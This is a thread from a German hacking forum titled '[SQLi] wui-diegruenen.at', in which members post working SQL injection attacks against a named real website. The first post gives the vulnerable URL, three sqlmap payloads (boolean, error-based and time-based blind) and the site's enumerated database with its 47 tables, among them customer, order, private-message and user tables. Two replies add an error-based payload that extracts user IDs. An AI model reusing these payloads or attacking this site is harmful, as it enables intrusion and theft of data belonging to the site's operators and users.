TOOLBASE

Willkommen Gast

Navigation

Links

View New Content

Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Als Gast hast du nur eingeschränkten Zugriff!

Sign In

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

Antworte auf Themen oder erstelle deine eigenen.
Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.

[SQLi] wui-diegruenen.at

Started by Ch!ller , 06.06.2018 19:25

Please log in to reply

2 replies to this topic

#1
Ch!ller

Posted 06 June 2018 - 19:25 Uhr

Shinigami

SubMod

Likes

959

896 posts
1395 Bedankt

Spender
verifiziert

http://www.wui-diegruenen.at/index.php?bid=24&site=themen&page=36

Parameter: bid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=24' RLIKE (SELECT (CASE WHEN (4717=4717) THEN 24 ELSE 0x28 END)) AND 'kQoE'='kQoE&site=themen&page=36

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: bid=24' AND (SELECT 8625 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(8625=8625,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gkCW'='gkCW&site=themen&page=36

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bid=24' AND SLEEP(5) AND 'xnxH'='xnxH&site=themen&page=36
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] information_schema
[*] wuidiegr_01

Database: wuidiegr_01
[47 tables]
+-------------------------+
| ajaxchat                |
| ajaxchat_user           |
| cm_bestellt             |
| cm_kunden               |
| cm_kurs_kunde           |
| cm_kurse                |
| cm_produkte             |
| emailaktionen           |
| emailaktionen_supporter |
| forum_bereiche          |
| forum_bereiche_user     |
| forum_comments          |
| forum_comments_posts    |
| forum_kategorien        |
| forum_kategorien_mods   |
| forum_kats_user         |
| forum_posts             |
| forum_posts_threads     |
| forum_threads           |
| forum_threads_kats      |
| frogos                  |
| gallery_anz             |
| gallery_fotos           |
| gallery_ordner          |
| group_rights            |
| news                    |
| newsletter              |
| newsletter_analytics    |
| newsletter_recipients   |
| newsletter_recipients_ |
| newsletter_rows         |
| pms                     |
| poll                    |
| poll_antworten          |
| poll_cookie             |
| settings                |
| statistik               |
| statistik_links         |
| thema                   |
| thema_bereich           |
| thema_gelesen           |
| themen_bereiche         |
| user_can                |
| user_hobbys             |
| user_must               |
| user_online             |
| user_sites              |
+-------------------------+

smc2014 and 3even like this

Alle Angaben und Informationen dienen lediglich der Theorie!

Back to top
Report

#2
SecurityFlaw

Posted 13 June 2018 - 19:14 Uhr

â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ

Members

Likes

213

256 posts
114 Bedankt

Jabber
Android, Android [root]
Windows, Linux

Geht ebenfalls hier:

http://www.wui-diegruenen.at/index.php?site=home'||(SELECT 'x' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3e,(SELECT MID((IFNULL(CAST(`user-id` AS CHAR),0x20)),1,100) FROM wuidiegr_01.user_must ORDER BY `user-id` LIMIT 0,1),0x3c00,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

smc2014 likes this

Back to top
Report

#3
pi^2

Posted 15 June 2018 - 23:54 Uhr

Hacker

Premium Member

Likes

273

181 posts
46 Bedankt

Geht ebenfalls hier:

http://www.wui-diegruenen.at/index.php?site=home'||(SELECT 'x' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3e,(SELECT MID((IFNULL(CAST(`user-id` AS CHAR),0x20)),1,100) FROM wuidiegr_01.user_must ORDER BY `user-id` LIMIT 0,1),0x3c00,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

ich sehe immernoch manuell unterwegs .. hut ab!

smc2014 and SecurityFlaw like this

Back to top
Report

Classic Hacking

	Topic	Forum	Started By	Stats	Last Post Info
	Zeus Grabber v1.0 Grab SQLi & Dork & Reverse IP	Leaks	annaa	0 replies 365 views	25 April 2025 - 16:56 Uhr By: annaa
	Zeus Grabber v1.0 Grab SQLi & Dork & Reverse IP	Leaks	annaa	0 replies 301 views	25 April 2025 - 16:49 Uhr By: annaa
	Suche beste Webseiten Scanner und Hacktool z. B für SQLI	Suchanfragen	logsgod	2 replies 2987 views	09 March 2025 - 16:46 Uhr By: logsgod

This topic has been visited by 46 user(s)

3even, bebekid32, ~~Bot4ng~~, C4shin0ut, Ch!ller, cyb3rfly, CyberFlash, DeepWater, ~~desmond~~, Dr. Spic, Exynos, fl4shx, Framerater, Freshness28, FrogPussyGreen, G4miT, gr33d, ~~gtawelt~~, headshotde, herp, IRET, Island, JohnR, kiwitone, kleinkriminell, leonalexkraus, loziov1, Makiavelic, mantwohouse, matrix567, mesagio, MiD_NiGHT, minchemuj, motory, nibble nibble, Osed28, p.samson, pepeSito, pi^2, ProHex, R3V3R53, SecurityFlaw, smc2014, Xenos88, xodiak, z91

Made with in germany.